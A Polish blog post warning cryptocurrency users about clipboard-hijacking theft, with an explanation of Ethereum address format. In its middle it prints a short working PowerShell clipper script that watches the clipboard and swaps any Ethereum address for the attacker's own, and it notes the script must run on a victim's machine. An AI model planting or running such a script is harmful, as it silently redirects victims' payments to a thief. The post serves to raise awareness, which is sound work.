Obecnie w związku z rozpowszechnieniem się kryptowalut poza tradycyjnym portfelem, często posiadamy także specjalne portfele kryptowalutowe. Posługiwanie się takim portfelem wymaga trochę wiedzy i sporo ostrożności. Czy wiedziałeś, jak łatwo można dać się nabrać i sporo stracić?
Czym jest portfel kryptowalutowy?
Portfel kryptowalutowy to miejsce, w którym teoretycznie możesz bezpiecznie przechowywać różne aktywa cyfrowe. Jest on integralną częścią każdego systemu blockchain. Posiadając taki portfel, możesz wykonywać wiele działań, w tym podpisywać transakcje, zarządzać saldem, a także korzystać z usług blockchain i uzyskiwać dostęp do rynków NFT. Każdy portfel w zależności od konkretnego blockchaina posiada unikalny adres, który jest alfanumerycznym identyfikatorem generowanym na podstawie kluczy publicznych i prywatnych. Ten adres to tak jakby współrzędne lokalizacji w łańcuchu bloków, do której można wysyłać cyfrowe dobra.
W czym problem?
Podczas posługiwania się portfelem zdarzają się sytuacje w których musisz posłużyć się jego adresem. Przykładowo zasilenie salda, przetransferowanie środków czy chociażby mintowanie NFT. Jako że, sam adres zwykle jest ciągiem liczb i liter, które dosyć ciężko zapamiętać i w zasadzie łatwo o pomyłkę najczęstszą techniką jest skopiowanie adresu i wklejenie w odpowiednie pole. W większości przypadków działa to doskonale pod warunkiem, że wklejasz właściwy adres.
Format adresu Ethereum
Jedną z najpopularniejszych kryptowalut, szczególnie jeżeli chodzi o NFT, jest Ethereum. Dlatego też tej kryptowalucie przyjrzymy się bliżej. Adres portfela Ethereum jest poprawny jeżeli spełnia następujące kryteria:
- zaczyna się od 0x
- zawiera 40 znaków hexadecymalnych (a-f, A-F, 0-9)
W adresach Ethereum nieistotna jest wielkość liter. Adres będzie działał zarówno wykorzystując tylko wielkie jak i małe znaki. Choć domyślnie w celu łatwiejszego odróżnienia poszczególnych liter jest to mieszanka.
Okazuje się, że znając te właściwości, podczas kopiowania do schowka możliwe jest zidentyfikowanie adresu. Co gorsza, możliwa jest również jego podmiana. Jeżeli nie sprawdzisz, czy wklejony adres się zgadza, a jakiś złośliwy skrypt podmienił go to w zasadzie koniec. Gdyż nie ma możliwości odzyskania środków.
Przykład prostego skryptu
Poniżej przykład mało zaawansowanego skryptu w PowerShellu, który podmienia adres portfela. Przykład służy tylko i wyłącznie do celów poglądowych, aby zobrazować problem. Wystarczy kilka linijek kodu chwila nieuwagi i tragedia gotowa.
Nie ponoszę żadnej odpowiedzialności za działanie i wykorzystanie skryptu.
$adres="0xd900eE01678e47C226E3c353c19677231E78AdAm"
for(;;) { $a=Get-Clipboard -Format Text
if($a -match "^0x[a-fA-F0-9]{40}")
{ Set-Clipboard $adres }
Start-Sleep 1 }Jak to działa?
Pomijając nudne szczegóły i fakt, że skrypt musi zostać uruchomiony na komputerze nic niepodejrzewającej ofiary to w pierwszej kolejności w zmiennej $adres definiujesz adres portfela do podmiany. Cały skrypt działa na zasadzie nieskończonej pętli i sprawdza stan schowka. Jeżeli znajdzie ciąg znaków, który spełnia określone warunki podmienia go na wartość zmiennej $adres. Jeżeli nikt nie zauważy różnicy we wklejonym adresie i zaakceptuje transakcję to po ptakach. Szukaj wiatru w polu.
Podsumowanie
Chociaż kopiowanie adresu wydaje się sensownym rozwiązaniem to zawsze, ale to zawsze sprawdzaj poprawność swojego adresu. Lepiej poświecić 3 minuty na sprawdzenie, niż stracić zgromadzone środki.
Źródła:
https://regexland.com/regex-ethereum-addresses/
https://academy.binance.com/pl/articles/crypto-wallet-types-explained
Tyle na dziś. Jeżeli masz jakieś ciekawe informacje w tym temacie to podziel się w komentarzach.
Jeżeli uważasz, że dobrze wykonaliśmy swoją robotę i dowiedziałeś się czegoś nowego to postaw nam wirtualną kawę.
